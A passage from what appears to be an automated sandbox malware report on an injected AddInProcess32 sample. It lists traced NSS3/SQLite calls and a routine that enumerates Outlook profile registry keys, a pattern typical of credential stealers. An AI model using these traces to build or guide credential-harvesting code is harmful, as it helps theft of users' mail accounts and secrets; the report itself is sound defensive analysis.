                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharErrorMultiWide$Last$EnterInitMallocMonitor___swprintf_l$CallocCriticalCurrentExitExplodeLibraryLoadPrintR_vsmprintfR_vsnprintfSectionThreadTimestrdup
                                                                                      • String ID: Loaded library %s (load lib)
                                                                                      • API String ID: 2265086803-2184673735
                                                                                      • Opcode ID: d64edd8f2bd51860156d031a8880fe03033fc43819c392dbe23d2a40098d371f
                                                                                      • Instruction ID: 406ab0b0fad867b216f188b546fdb6dda0f8f360d02e778f685d8d11546b3f44
                                                                                      • Opcode Fuzzy Hash: d64edd8f2bd51860156d031a8880fe03033fc43819c392dbe23d2a40098d371f
                                                                                      • Instruction Fuzzy Hash: 6D51A771B012159FEB11AF298C44A9AB7BCEB49764F5001A9E918E7780EB709E84CB61

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PR_GetPageSize.NSS3(6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD410E
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4118
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4129
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD413A
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD414B
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD415C
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD416D
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD417E
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD418F
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41A0
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41B1
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41C2
                                                                                      • PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41D6
                                                                                      • PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41DB
                                                                                      • PR_NewLock.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41F9
                                                                                      • PT_FPrintStats.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD421D
                                                                                      • PR_NewLock.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD422C
                                                                                      • PR_NewCondVar.NSS3(00000000,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4237
                                                                                      • PT_FPrintStats.NSS3 ref: 6CCD424E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Module$PrintStats$Lock$CondPageSize
                                                                                      • String ID: clock
                                                                                      • API String ID: 3312181427-3195780754
                                                                                      • Opcode ID: cf7d0ad79e0daa062e251b50efbf873b627e862b77f3ca90b999d0d7f2f58dc2
                                                                                      • Instruction ID: 4f9d72152ecdca324e9c8ba63169bd5b5a286e197a6ef9c5b19b51a69ffbabc4
                                                                                      • Opcode Fuzzy Hash: cf7d0ad79e0daa062e251b50efbf873b627e862b77f3ca90b999d0d7f2f58dc2
                                                                                      • Instruction Fuzzy Hash: 5521B9B1F552518EEE00FFB4854239C7AF4EF4B618F520459929886F60FB781198EB73

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PR_GetPageSize.NSS3(6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD410E
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4118
                                                                                        • Part of subcall function 6CCC7CB4: PR_Init.NSS3(?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CC0
                                                                                        • Part of subcall function 6CCC7CB4: PR_Calloc.NSS3(00000001,0000000C,?,?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CCA
                                                                                        • Part of subcall function 6CCC7CB4: strdup.MOZGLUE(?,?,?,6CCD411D,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC7CDA
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4129
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD413A
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD414B
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD415C
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD416D
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD417E
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD418F
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41A0
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41B1
                                                                                      • PR_NewLogModule.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41C2
                                                                                        • Part of subcall function 6CCCFE37: TlsAlloc.KERNEL32(?,6CCD41D1,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE3E
                                                                                        • Part of subcall function 6CCCFE37: TlsAlloc.KERNEL32(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE45
                                                                                        • Part of subcall function 6CCCFE37: TlsAlloc.KERNEL32(?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE4C
                                                                                        • Part of subcall function 6CCCFE37: GetModuleHandleW.KERNEL32(kernel32.dll,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCFE58
                                                                                        • Part of subcall function 6CCCFE37: GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6CCCFE69
                                                                                      • PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41D6
                                                                                      • PT_FPrintStats.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41DB
                                                                                        • Part of subcall function 6CCD9A70: PR_NewLock.NSS3(6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD9A70
                                                                                        • Part of subcall function 6CCDBCBE: PR_Calloc.NSS3(00000001,00000200,6CCD41EA,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCDBCC5
                                                                                        • Part of subcall function 6CCD3699: PR_NewLock.NSS3(6CCD41EF,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD3699
                                                                                        • Part of subcall function 6CCC77AE: PR_NewLock.NSS3(?,6CCD41F4,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC77BA
                                                                                      • PR_NewLock.NSS3(clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD41F9
                                                                                        • Part of subcall function 6CCD98DD: PR_Init.NSS3(6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98E6
                                                                                        • Part of subcall function 6CCD98DD: PR_Calloc.NSS3(00000001,00000084,?,6CCD9A75,6CCD41E5,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD98F3
                                                                                        • Part of subcall function 6CCDA791: PR_NewLock.NSS3(?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCDA797
                                                                                        • Part of subcall function 6CCDA791: PR_NewLock.NSS3(?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCDA7A1
                                                                                        • Part of subcall function 6CCDA791: PR_Calloc.NSS3(00000001,0000002C,?,?,?,?,6CCD420E,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D), ref: 6CCDA7B1
                                                                                        • Part of subcall function 6CCDA791: TlsSetValue.KERNEL32(00000000), ref: 6CCDA7EB
                                                                                        • Part of subcall function 6CCDA791: PR_NewCondVar.NSS3 ref: 6CCDA822
                                                                                        • Part of subcall function 6CCDA791: PR_NewLock.NSS3 ref: 6CCDA875
                                                                                        • Part of subcall function 6CCDB16C: PR_NewLock.NSS3(6CCD4213,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCDB16C
                                                                                        • Part of subcall function 6CCC6349: PR_GetFileMethods.NSS3(?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0), ref: 6CCC634B
                                                                                        • Part of subcall function 6CCC6349: PR_NewLock.NSS3(?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0), ref: 6CCC6357
                                                                                        • Part of subcall function 6CCC6349: PR_NewCondVar.NSS3(00000000,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCC6362
                                                                                        • Part of subcall function 6CCC6349: GetStdHandle.KERNEL32(000000F6,00000000,?,?,6CCD4218,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCC6376
                                                                                        • Part of subcall function 6CCC6349: PR_AllocFileDesc.NSS3(00000000,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC6379
                                                                                        • Part of subcall function 6CCC6349: GetStdHandle.KERNEL32(000000F5,00000000,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCC6388
                                                                                        • Part of subcall function 6CCC6349: PR_AllocFileDesc.NSS3(00000000,?,?,6CCC57D0,?), ref: 6CCC638B
                                                                                        • Part of subcall function 6CCC6349: GetStdHandle.KERNEL32(000000F4,00000000,?,6CCC57D0,?), ref: 6CCC639A
                                                                                        • Part of subcall function 6CCC6349: PR_AllocFileDesc.NSS3(00000000,?,6CCC57D0,?), ref: 6CCC639D
                                                                                        • Part of subcall function 6CCC6349: WSAStartup.WSOCK32(00000101,?), ref: 6CCCECBC
                                                                                        • Part of subcall function 6CCD573A: PR_NewLock.NSS3(6CCD421D,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD573A
                                                                                      • PT_FPrintStats.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD421D
                                                                                        • Part of subcall function 6CCC7DE4: PR_NewLock.NSS3 ref: 6CCC7DF5
                                                                                        • Part of subcall function 6CCC7DE4: PR_GetEnv.NSS3(NSPR_LOG_MODULES), ref: 6CCC7E04
                                                                                        • Part of subcall function 6CCC7DE4: _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync,?,?,?,?,?), ref: 6CCC7E8C
                                                                                        • Part of subcall function 6CCC7DE4: PR_SetLogBuffering.NSS3(00004000,?,?), ref: 6CCC7F97
                                                                                        • Part of subcall function 6CCC7DE4: PR_GetEnvSecure.NSS3(00004000,?,?), ref: 6CCC7FA3
                                                                                        • Part of subcall function 6CCC7DE4: PR_SetLogFile.NSS3(00000000,?), ref: 6CCC7FB6
                                                                                        • Part of subcall function 6CCCC58E: PR_NewNamedMonitor.NSS3(linker-lock,6CCD422C,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCCC59C
                                                                                        • Part of subcall function 6CCCC58E: PR_EnterMonitor.NSS3(0520EDA0,?,6CCD422C,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0), ref: 6CCCC5A9
                                                                                        • Part of subcall function 6CCCC58E: PR_Calloc.NSS3(00000001,00000014,0520EDA0,?,6CCD422C,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCCC5B2
                                                                                        • Part of subcall function 6CCCC58E: strdup.MOZGLUE(Executable,00000001,00000014,0520EDA0,?,6CCD422C,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000), ref: 6CCCC5BE
                                                                                        • Part of subcall function 6CCCC58E: GetModuleHandleA.KERNEL32(00000000), ref: 6CCCC5CB
                                                                                        • Part of subcall function 6CCCC58E: PR_LogPrint.NSS3(Loaded library %s (init),00000000), ref: 6CCCC5FD
                                                                                        • Part of subcall function 6CCCC58E: PR_ExitMonitor.NSS3 ref: 6CCCC60A
                                                                                      • PR_NewLock.NSS3(00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD422C
                                                                                      • PR_NewCondVar.NSS3(00000000,00000000,00000001,00000000,clock,6CCDB207,6CCD36FB,?,6CCCEA39,FFFFE89D,00000000,?,?,6CCC57D0,?), ref: 6CCD4237
                                                                                        • Part of subcall function 6CCD96AE: PR_Calloc.NSS3(00000001,00000084,00000000,?,6CCDA827), ref: 6CCD96B9
                                                                                        • Part of subcall function 6CCD2058: PR_NewLock.NSS3(6CCD4249), ref: 6CCD2058
                                                                                        • Part of subcall function 6CCD2058: PR_NewLock.NSS3(6CCD4249), ref: 6CCD2062
                                                                                        • Part of subcall function 6CCC91B9: PR_NewLock.NSS3(6CCD424E), ref: 6CCC91B9
                                                                                        • Part of subcall function 6CCC91B9: PR_Calloc.NSS3(00000001,0000000C,6CCD424E), ref: 6CCC91C7
                                                                                        • Part of subcall function 6CCC91B9: PR_MillisecondsToInterval.NSS3(00000064,00000001,0000000C,6CCD424E), ref: 6CCC91D8
                                                                                      • PT_FPrintStats.NSS3 ref: 6CCD424E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641931686.000000006CD86000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2642000549.000000006CD8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6cc60000_AddInProcess32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lock$Module$Calloc$Alloc$FileHandlePrint$Stats$CondDescMonitor$Initstrdup$AddressBufferingEnterExitIntervalMethodsMillisecondsNamedPageProcSecureSizeStartupValue_stricmp
                                                                                      • String ID: clock
                                                                                      • API String ID: 3715144677-3195780754
                                                                                      • Opcode ID: bf1707d91e0a8c16cf7d1918d7137cd6d8da39043ac72667159f8d2af7415616
                                                                                      • Instruction ID: 11030d97763598a3a623a64b599030577061d73a1327f4ced797c2f88950b727
                                                                                      • Opcode Fuzzy Hash: bf1707d91e0a8c16cf7d1918d7137cd6d8da39043ac72667159f8d2af7415616
                                                                                      • Instruction Fuzzy Hash: 9921DBB1F592518EEE00FFB4854229C7AF4EF4B218F520459929886F60FF781198EB73

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 875 40983d-409898 call 4011c0 call 401052 * 2 RegOpenKeyExW 882 4098a1-4098b5 RegOpenKeyExW 875->882 883 40989a-40989f 875->883 885 4098b7-4098bc 882->885 886 4098be-4098d2 RegOpenKeyExW 882->886 884 4098f7-409922 lstrcpyW RegQueryInfoKeyW 883->884 889 4099f8 884->889 890 409928-40992b 884->890 885->884 887 4098d4-4098d9 886->887 888 4098db-4098f0 RegOpenKeyExW 886->888 887->884 888->889 894 4098f6 888->894 893 4099fa-4099fe 889->893 891 409931-409955 RegEnumKeyExW 890->891 892 4099f3-4099f6 890->892 891->889 895 40995b-4099b5 RegCloseKey lstrcpyW lstrcatW * 2 RegOpenKeyExW 891->895 892->893 894->884 895->889 896 4099b7-4099e7 call 4099ff RegCloseKey RegOpenKeyExW 895->896 896->889 899 4099e9-4099ed 896->899 899->891 899->892
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?,?,?,?,?,00000000), ref: 00409894
                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,00000000,000F003F,?,?,?,?,?,00000000), ref: 004098B1
                                                                                      • lstrcpyW.KERNEL32(?,Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676,?,?,?,?,00000000), ref: 00409904
                                                                                      • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0040991A
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,?), ref: 0040994D
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0040995E
                                                                                      • lstrcpyW.KERNEL32(?,?,?,?,?,?), ref: 00409972
                                                                                      • lstrcatW.KERNEL32(?,004176A4,?,?,?,?), ref: 00409980
                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?), ref: 00409994
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,?,?), ref: 004099B1
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?), ref: 004099C6
                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,000F003F,?,?,?,?,?,?), ref: 004099E3
                                                                                      Strings
                                                                                      • Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040988A
                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098A7, 004098B7
                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098E1, 004098E6, 004098F6
                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676, xrefs: 004098C4, 004098D4
                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, xrefs: 0040989A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_AddInProcess32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Open$Closelstrcatlstrcpy$EnumInfoQuery
                                                                                      • String ID: Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                                                                                      • API String ID: 1891545080-2020977430
                                                                                      • Opcode ID: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                                                                      • Instruction ID: b767e8cf4ef787b214c4ffa932510dbda8161c68e187407f9f6ec9346f9c833f
                                                                                      • Opcode Fuzzy Hash: 40b4fd36dbe4f67ba16c9aca2a71b9966dd24b4d9f9d71e2ba876c99abfa7a87
                                                                                      • Instruction Fuzzy Hash: E1411EB290021DBEEB20DA91CC85EFB777CEF05384F1005BAB515F2151E6789E85ABA4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 900 6cc871fa-6cc87218 sqlite3_initialize 901 6cc8721e-6cc8722b 900->901 902 6cc875ef-6cc875f4 900->902 903 6cc8722d-6cc87232 901->903 904 6cc87234-6cc87236 901->904 903->904 905 6cc87238-6cc87243 903->905 906 6cc87246-6cc8724b 904->906 905->906 907 6cc8724d-6cc87252 906->907 908 6cc87254-6cc8725a 906->908 909 6cc87261-6cc8727d call 6cca1c46 907->909 908->909 910 6cc8725c 908->910 913 6cc872a8-6cc872aa 909->913 914 6cc8727f-6cc87281 909->914 910->909 917 6cc872ab-6cc872b8 sqlite3_errcode 913->917 915 6cc872cc-6cc873c7 sqlite3_mutex_enter call 6cc73383 * 5 914->915 916 6cc87283-6cc87289 914->916 937 6cc87459 915->937 938 6cc873cd-6cc873f5 call 6cc9982a 915->938 918 6cc8728b-6cc8728d 916->918 919 6cc8728f-6cc87297 916->919 920 6cc872be-6cc872c7 sqlite3_close 917->920 921 6cc875d2-6cc875d4 917->921 923 6cc87298-6cc8729d 918->923 919->923 924 6cc875dd-6cc875ec sqlite3_free 920->924 921->924 925 6cc875d6 921->925 923->915 929 6cc8729f-6cc872a6 sqlite3_free 923->929 924->902 925->924 929->913 940 6cc8745c-6cc8745e 937->940 943 6cc87404-6cc8741f call 6cca39c2 938->943 944 6cc873f7-6cc87402 call 6cca1ec4 938->944 941 6cc8745f-6cc87468 sqlite3_mutex_leave 940->941 941->917 949 6cc87422-6cc87426 943->949 944->949 950 6cc87428-6cc8742d 949->950 951 6cc8746d-6cc87483 call 6cc92770 949->951 952 6cc87438-6cc87456 call 6cc96c51 sqlite3_free 950->952 953 6cc8742f-6cc87435 call 6cca2155 950->953 957 6cc87488-6cc8748d 951->957 952->937 953->952 960 6cc8748f-6cc874a3 call 6cc96bb3 957->960 961 6cc874a5-6cc874c9 call 6cc91af0 call 6cca7ae9 957->961 960->941 968 6cc874cb-6cc874d4 961->968 969 6cc874d7-6cc8751f call 6cc922e8 call 6cca7ae9 961->969 968->969 969->940 974 6cc87525-6cc87542 call 6cc96bb3 sqlite3_overload_function 969->974 977 6cc8754d-6cc87556 sqlite3_errcode 974->977 978 6cc87544-6cc8754a call 6cca2155 974->978 980 6cc87558-6cc87568 call 6cc90666 sqlite3_errcode 977->980 981 6cc8756e-6cc87572 977->981 978->977 980->941 980->981 984 6cc8759e-6cc875a0 981->984 985 6cc87574-6cc87576 981->985 986 6cc875ab-6cc875cd call 6cc8ec85 call 6cc6b5e2 984->986 987 6cc875a2-6cc875aa call 6cc96bb3 984->987 989 6cc87578-6cc8757e call 6cc9c259 985->989 990 6cc8757f-6cc87583 985->990 986->941 987->986 989->990 990->984 994 6cc87585-6cc87587 990->994 994->987 998 6cc87589-6cc8759b call 6cc7349c 994->998 998->984
                                                                                      APIs
                                                                                      • sqlite3_initialize.NSS3 ref: 6CC87211
                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CC872A0
                                                                                      • sqlite3_errcode.NSS3(00000000), ref: 6CC872AC
                                                                                      • sqlite3_close.NSS3(00000000), ref: 6CC872BF
                                                                                      • sqlite3_mutex_enter.NSS3(?), ref: 6CC872CF
                                                                                      • sqlite3_free.NSS3(?,00000000,00000000,6CD51024,?), ref: 6CC87451
                                                                                      • sqlite3_mutex_leave.NSS3(?), ref: 6CC87462
                                                                                      • sqlite3_overload_function.NSS3(00000000,MATCH,00000002,00000000,00000000), ref: 6CC87535
                                                                                        • Part of subcall function 6CC692C7: sqlite3_mutex_enter.NSS3(?,?,?,?,6CC8753A,00000000,MATCH,00000002,00000000,00000000), ref: 6CC692D4
                                                                                        • Part of subcall function 6CC692C7: sqlite3_mutex_leave.NSS3(?,00000000,00000000,6CC8753A,00000000,MATCH,00000002,00000000,00000000), ref: 6CC69317
                                                                                      • sqlite3_errcode.NSS3(00000000), ref: 6CC8754E
                                                                                      • sqlite3_errcode.NSS3(00000000,00000000), ref: 6CC8755F
                                                                                      • sqlite3_free.NSS3(00000000), ref: 6CC875E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2639617318.000000006CC61000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CC60000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2639575785.000000006CC60000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.2641402406.000000006CD50000.00000002.00000001.01000000.00000009.sdmpDownload File
